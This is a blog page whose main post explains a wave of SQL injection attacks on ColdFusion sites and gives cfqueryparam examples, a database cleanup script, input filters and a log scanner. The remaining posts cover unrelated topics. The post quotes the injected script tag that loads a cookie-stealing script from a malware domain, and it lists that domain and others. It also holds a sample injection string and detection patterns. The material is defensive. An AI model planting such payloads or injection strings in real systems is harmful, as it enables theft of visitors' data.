SQL Injection Attacks and How to protect yourself

ColdFusion , SQL Server 37 Comments »

This week there has been an increase in SQL Injection attacks, specifically against ColdFusion sites, since the hackers have discovered they are also vulnerable, primarily because most developers do not use <cfqueryparam>. You should also be aware that, prior to the actual attacks, bots first run vulnerability tests against sites to find out which language and which database they are using, to determine which vulnerability they may be vulnerable to.

Use of cfqueryparam is pretty much a must-have requirement for your queries these days and is generally secure because it results in a prepared statement, in which the value is always bound as a string and so is not vulnerable to SQL injection. But many ColdFusion developers do not seem to use cfqueryparam, probably because they do not know it exists. In fact cfqueryparam has existed since CF 4.5, and I have to admit even I didn't know that; it has only really been promoted as a best practice and a way to avoid SQL injection since CF 6.
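To make the point concrete, here is an added example (not code from the original post) showing a lookup that concatenates a URL variable straight into the SQL, beside the same query rewritten with cfqueryparam. The datasource name "mydsn", the products table and the URL.id / FORM.search variables are assumptions for the example.

```cfml
<!--- Added example, not from the original post. Datasource "mydsn" and the
      products table are assumed; substitute your own. --->

<!--- VULNERABLE: whatever arrives in URL.id becomes part of the SQL text, so a
      value such as  1;DECLARE ...  is executed as SQL by the database --->
<cfquery name="getProduct" datasource="mydsn">
    SELECT id, name, description
    FROM products
    WHERE id = #URL.id#
</cfquery>

<!--- SAFE: the value is sent as a bound parameter of a prepared statement, so
      it is never parsed as SQL, and cfsqltype rejects anything that is not an
      integer before the query is even sent --->
<cfparam name="URL.id" default="0" type="integer">
<cfquery name="getProduct" datasource="mydsn">
    SELECT id, name, description
    FROM products
    WHERE id = <cfqueryparam value="#URL.id#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- String parameters work the same way; maxlength bounds what is accepted,
      and the wildcards are added to the value, not to the SQL text --->
<cfparam name="FORM.search" default="">
<cfquery name="findProducts" datasource="mydsn">
    SELECT id, name
    FROM products
    WHERE name LIKE <cfqueryparam value="%#FORM.search#%" cfsqltype="cf_sql_varchar" maxlength="60">
</cfquery>
```

The cfparam line on its own is the fallback the post mentions for older CF versions: with type="integer" it throws before the query runs if the value is not a whole number, but cfqueryparam should still be used wherever it is available, because it also covers string values that cannot be validated by type alone.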

In mid-July, the hacker webzine 0x000000.com discussed potential pitfalls, particularly within older versions of ColdFusion, which could lend themselves to potential compromise:

~ Easily discoverable passwords
~ Lack of parameterized query handling
~ Failure to properly escape single quotes
~ Returning error messages that are too verbose

Like standard SQL injection, ColdFusion attacks have been around for years. What appears to have happened now is the same thing that led to the millions of compromises in the ASP/SQL Server attacks: the use of automated tools.

Following are some of the malware domains involved in the recent ColdFusion attacks:

  • mh.976801.cn
  • 1.verynx.cn
  • mm.ll80.com

Over at CFMX Hosting we have had quite a lot of customers hit by the verynx.cn attack, which inserts the following into your database tables.

</title><script src="http://1.verynx.cn/w.js"></script>

The resulting JavaScript, which gets loaded into your pages, is used to "phish" your visitors' details by copying their cookies and other personal details from form fields. There are various incarnations of this attack now, resulting in different scripts being inserted into your database. If restoring a database backup is not an option for you, then the following little script may help you out.

DECLARE @T varchar(255), @C varchar(4000)
-- every text/ntext/nvarchar/varchar column (xtype 99/35/231/167) of every user table
DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b
    WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- replace() rejects text/ntext columns, so cast first (nvarchar(max) needs SQL Server 2005+; on SQL 2000 use varchar(8000), which truncates longer values)
    EXEC('UPDATE [' + @T + '] SET [' + @C + '] = replace(cast([' + @C + '] AS nvarchar(max)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''')')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This script will UNDO the changes made by the attack by searching for the aforementioned string in all columns of all tables in your database and removing it. All you need to do is modify the string to match the changes that were made to your database. If your site was attacked multiple times then the string may appear more than once, so you may have to run this script more than once.

Protecting Yourself 

All of the attacks we have seen so far seem to be implemented using the "Exec()" command, so they only affect Microsoft SQL Server databases. A quick and easy way to stop this is to add a URL and FORM scope validation script to your Application.cfm or Application.cfc to make sure none of these variables contain the Exec() command.

E.G.

<!--- check every FORM field for an exec( call ("contains" is case-insensitive) --->
<cfloop collection="#form#" item="item">
    <cfif form[item] contains "exec(">
        .. your decision code here ...
    </cfif>
</cfloop>
<!--- same check for the URL scope; note it must read url[item], not form[item] --->
<cfloop collection="#URL#" item="item">
    <cfif url[item] contains "exec(">
        .. your decision code here ...
    </cfif>
</cfloop>

You could of course expand this further to check for any kind of SQL statement in the FORM or URL scope, as there should never be any SQL in these scopes if your code is well written. Your decision code determines what happens when a match is found. As it is obviously an attack, there is no point in stripping out the unwanted strings and continuing to process the request, so you may as well just abort it or generate an error page.

You should of course also be adding cfqueryparam tags to all your queries too, or if you are still running an older version of CF then you should be validating the data types in another way, using <cfparam> or val() for example.

The best approach you can take is to lock down your database users with specific permissions so that your web site can only SELECT from the database and cannot update, delete or execute. You should ideally only allow these permissions from your backend admin system. If there are parts of your site that need to update the database, restrict the DB user or DSN so it can only update the specific tables/columns they need.

If you need to find out which pages on your site have been attacked, then you should check your web logs and search for things like "exec" or "declare" or other SQL statements.
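As an added example (not code from the original post), the following ColdFusion page scans web server log lines for requests whose URL-decoded query string carries the SQL keywords mentioned above. The three log lines are constructed samples in IIS W3C format so the page runs without a real log; the keyword list and the suggestion to use <cfloop file="..."> (ColdFusion 8 or later) for a real log file are assumptions.

```cfml
<!--- Added example, not from the original post. The log lines below are
      constructed samples; to scan a real IIS log, replace the cfsavecontent
      and the list loop with <cfloop file="#logPath#" index="line"> (CF8+). --->
<cfsavecontent variable="sampleLog">
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-07-28 10:01:02 10.0.0.5 GET /product.cfm id=42 203.0.113.9 200
2008-07-28 10:01:07 10.0.0.5 GET /product.cfm id=42;DECLARE%20@S%20varchar(4000);EXEC(@S)-- 203.0.113.9 200
2008-07-28 10:01:09 10.0.0.5 GET /news.cfm article=7 198.51.100.3 200
</cfsavecontent>

<!--- SQL fragments that have no business in a URL or form field of a
      well-written site; extend the list as you see new variants --->
<cfset sqlPattern = "(exec\s*\(|declare\s+@|cast\s*\(|sysobjects|syscolumns)">
<cfset hits = arrayNew(1)>

<cfloop list="#sampleLog#" delimiters="#chr(10)##chr(13)#" index="line">
    <cfset line = trim(line)>
    <!--- W3C header lines start with a pound sign and carry no request --->
    <cfif len(line) AND left(line, 1) NEQ "##">
        <!--- the payload is usually URL-encoded, sometimes twice, so decode
              before matching; the whole line is matched, so the field layout
              of the log does not matter --->
        <cfset decoded = URLDecode(URLDecode(line))>
        <cfif reFindNoCase(sqlPattern, decoded)>
            <cfset arrayAppend(hits, line)>
        </cfif>
    </cfif>
</cfloop>

<!--- HTMLEditFormat so the logged payload is shown as text, never rendered --->
<cfoutput>
<p>#arrayLen(hits)# suspicious request(s) found</p>
<cfloop array="#hits#" index="hit"><pre>#HTMLEditFormat(hit)#</pre></cfloop>
</cfoutput>
```

With the constructed input only the second line is reported; the cs-uri-stem field of each hit tells you which page was targeted, and the c-ip field which client sent the request, which is what you need when deciding which templates to fix first.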

Automating Database maintenance in SQL 2005 Express Edition

SQL Server 2 Comments »

If you have been using SQL Server 2005 Express you will no doubt have noticed the lack of any backup options in SQL Web Studio Express or a SQL Agent, which is a big issue as you should be keeping backups of your databases.

Thankfully there is a solution using the expressmaint utility and windows scheduled tasks, and I found this handy article on how to use this solution to overcome this limitation of SQL Server 2005 express.

Now I just need to find a solution for the lack of import/export facilities, which I think is a major omission from Web Studio Express and really limits its usefulness.

Sysinternals Live

Jibber Jabber No Comments »

If you’re a fan of the Sysinternals tools, check out the beta of Sysinternals Live, a service that makes it easy for you to execute Sysinternals tools directly from the Web without hunting for and manually downloading them. Simply enter a tool’s Sysinternals Live path into Windows Explorer, or at the command prompt as \\live.sysinternals.com\tools\<toolname>, or view the entire Sysinternals Live tools directory in a browser.

The Sysinternals tools are a must-have for any system administrator's toolbox. I regularly use Sysmon and Filemon to diagnose system problems, and for you ColdFusion admins they are especially useful for tracking down ColdFusion permission issues when you are locking down a ColdFusion installation.

Is there any point in contacting Trading Standards?

Rogue Traders 1 Comment »

Like many, I have contacted Trading Standards on several occasions, some of which are mentioned on this very site in my "Rogue Traders" section, but sadly their responses have generally been just to provide information on how to take action yourself.

The usual response you get from them is "we cannot help with civil matters", so I decided to ask them straight out what they consider to be a civil matter, as it seemed to be just about everything I ever contacted them about. I have pasted their response below; as you can see, they are saying that any matter resulting from the purchase of goods or services falls under "civil law".

Now what situation are you likely to contact them about that doesn't involve the purchase of goods or services? There certainly are not many I can think of, so anything you contact them about will automatically fall under "civil law", and thus they are effectively saying that they will not be able to help you or take any action.

Things that fall outside civil law would be cases where a trader is acting illegally or committing a criminal offence, or a health and safety issue in which case Trading Standards say they may be able to investigate or take some action, but these things do invariably take a very long time.

Like most I always thought that Trading Standards were there to protect the public from the rogue traders and rip-off merchants, that some good would come out of reporting such people to them and that they would eventually be stopped, but this doesn't appear to be the case at all, as the law seems to stop them doing anything and is on the side of the criminals. Just have a look at my Sky Scammers post and see how many comments there are from people who have been duped; in fact one of the companies mentioned has been on BBC Watchdog, so they are scamming thousands of people all over the country every day. Most of the people who commented have contacted Trading Standards, and clearly fraudulently charging people's credit cards and scamming them into signing up for their services by pretending to be SKY cannot be a civil matter as they are breaking the law, so one has to wonder how they have been able to get away with it for so long.

To be honest I am not sure whether the fault lies with the law or with Trading Standards, but either way something clearly needs to change to put a stop to these rogue traders, who seem to have a "license to con" without any reprisal, while the public seem to have no rights when this happens other than to try and take legal action.

National Cycle SwitchBlade windshields and chrome lowers

Biker Stuff , Product Reviews 4 Comments »
[Images: SwitchBlade Windshield; SwitchBlade quick release mount system; Windshield bag]

The SwitchBlade® Windshields utilise the new SwitchBlade Mounting System, which allows riders to easily install, switch, or remove their windshield in less than 5 seconds.

Powered by Mango Blog. Design and Icons by N.Design Studio